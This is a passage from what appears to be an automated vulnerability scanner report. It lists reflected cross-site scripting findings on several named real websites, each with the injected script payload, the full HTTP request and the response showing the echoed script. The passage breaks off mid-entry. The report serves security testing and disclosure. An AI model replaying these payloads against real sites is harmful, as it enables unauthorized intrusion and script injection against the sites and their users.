...[SNIP]...

3.44. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d96a6"-alert(1)-"8cef4f02abe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast/2011/0105d96a6"-alert(1)-"8cef4f02abe/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:26:04 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Sat, 22 Jan 2011 22:26:05 GMT
Date: Fri, 21 Jan 2011 22:26:05 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/2011/0105d96a6"-alert(1)-"8cef4f02abe/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.45. http://www.csmonitor.com/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60b23"-alert(1)-"9fda35e2e30 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity60b23"-alert(1)-"9fda35e2e30 HTTP/1.1
Host: www.csmonitor.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 22:26:15 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86373
Expires: Sat, 22 Jan 2011 22:25:49 GMT
Date: Fri, 21 Jan 2011 22:26:16 GMT
Content-Length: 22093
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<!--seo title-->

<tit
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/USA/Politics/monitor_breakfast/2011/0105/Howard-Dean-tea-party-is-last-gasp-of-generation-that-fears-diversity60b23"-alert(1)-"9fda35e2e30";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

3.46. http://www.customerservicecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8654b"><script>alert(1)</script>5d8c4dcbe63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8654b"><script>alert(1)</script>5d8c4dcbe63=1 HTTP/1.1
Host: www.customerservicecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eq95mr8o98fkhjs3ktog20fuf3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119276

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.customerservicecrossing.com/?8654b"><script>alert(1)</script>5d8c4dcbe63=1">
...[SNIP]...

3.47. http://www.dbacrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fd83"><script>alert(1)</script>ed7396c311c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4fd83"><script>alert(1)</script>ed7396c311c=1 HTTP/1.1
Host: www.dbacrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eph2bliclbes6e30d2h8tu8tq4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125729

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dbacrossing.com/?4fd83"><script>alert(1)</script>ed7396c311c=1">
...[SNIP]...

3.48. http://www.dentalcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0261"><script>alert(1)</script>118fbccd4ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e0261"><script>alert(1)</script>118fbccd4ca=1 HTTP/1.1
Host: www.dentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:17 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t7apdouasjul5pdruunarl3np6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111881

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dentalcrossing.com/?e0261"><script>alert(1)</script>118fbccd4ca=1">
...[SNIP]...

3.49. http://www.designingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e77f8"><script>alert(1)</script>c45ddc233d5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?e77f8"><script>alert(1)</script>c45ddc233d5=1 HTTP/1.1
Host: www.designingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=voh1qpdojh74kuvvl210bd7ti4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 122755

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.designingcrossing.com/?e77f8"><script>alert(1)</script>c45ddc233d5=1">
...[SNIP]...

3.50. http://www.diversitycrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 536ad"><script>alert(1)</script>92d710e5331 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?536ad"><script>alert(1)</script>92d710e5331=1 HTTP/1.1
Host: www.diversitycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:32 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mvngm9tnor0sktfdm2him70ht6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:32 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135910

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.diversitycrossing.com/?536ad"><script>alert(1)</script>92d710e5331=1">
...[SNIP]...

3.51. http://www.dotnetcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ff65"><script>alert(1)</script>d0021da73b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5ff65"><script>alert(1)</script>d0021da73b5=1 HTTP/1.1
Host: www.dotnetcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:34 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=tcm1i9njojb6ne685f4rk35d16; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111425

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.dotnetcrossing.com/?5ff65"><script>alert(1)</script>d0021da73b5=1">
...[SNIP]...

3.52. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dyn-web.com
Path:   /bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed13c<a>aca04e604f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bused13c<a>aca04e604f5/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:34:47 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=f71522e635f566773a14ae500b4e2916; path=/
Connection: close
Content-Type: text/html
Content-Length: 5456

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a>aca04e604f5/">Bused13c<a>aca04e604f5</a>
...[SNIP]...

3.53. http://www.dyn-web.com/bus/terms.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.dyn-web.com
Path:   /bus/terms.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a0a"><a>7585948a4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /bus60a0a"><a>7585948a4e/terms.html HTTP/1.1
Host: www.dyn-web.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:34:39 GMT
Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Set-Cookie: PHPSESSID=1089af8a8270c6f1de1622faa083f934; path=/
Connection: close
Content-Type: text/html
Content-Length: 5458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Page No
...[SNIP]...
<a href="/bus60a0a"><a>7585948a4e/">
...[SNIP]...

3.54. http://www.ecommercecrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4aad"><script>alert(1)</script>8c4d139c8e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?b4aad"><script>alert(1)</script>8c4d139c8e9=1 HTTP/1.1
Host: www.ecommercecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:45 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qgp06lth3p2j8damhlniukmo55; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:45 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 123070

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.ecommercecrossing.com/?b4aad"><script>alert(1)</script>8c4d139c8e9=1">
...[SNIP]...

3.55. http://www.editingcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a2ad"><script>alert(1)</script>a026aea5f67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?8a2ad"><script>alert(1)</script>a026aea5f67=1 HTTP/1.1
Host: www.editingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=40ci97cu8vt0v2j4827q3o6no5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.editingcrossing.com/?8a2ad"><script>alert(1)</script>a026aea5f67=1">
...[SNIP]...

3.56. http://www.educationcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53272"><script>alert(1)</script>8ec396783fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?53272"><script>alert(1)</script>8ec396783fa=1 HTTP/1.1
Host: www.educationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=5m4pm2cqvrvekdct0vuo061882; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:25:55 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112789

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.educationcrossing.com/?53272"><script>alert(1)</script>8ec396783fa=1">
...[SNIP]...

3.57. http://www.employmentcrossing.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9d32"><script>alert(1)</script>3c4df51b6d0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?c9d32"><script>alert(1)</script>3c4df51b6d0=1 HTTP/1.1
Host: www.employmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qagf6dbtbo4lqfkvatbk0434m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
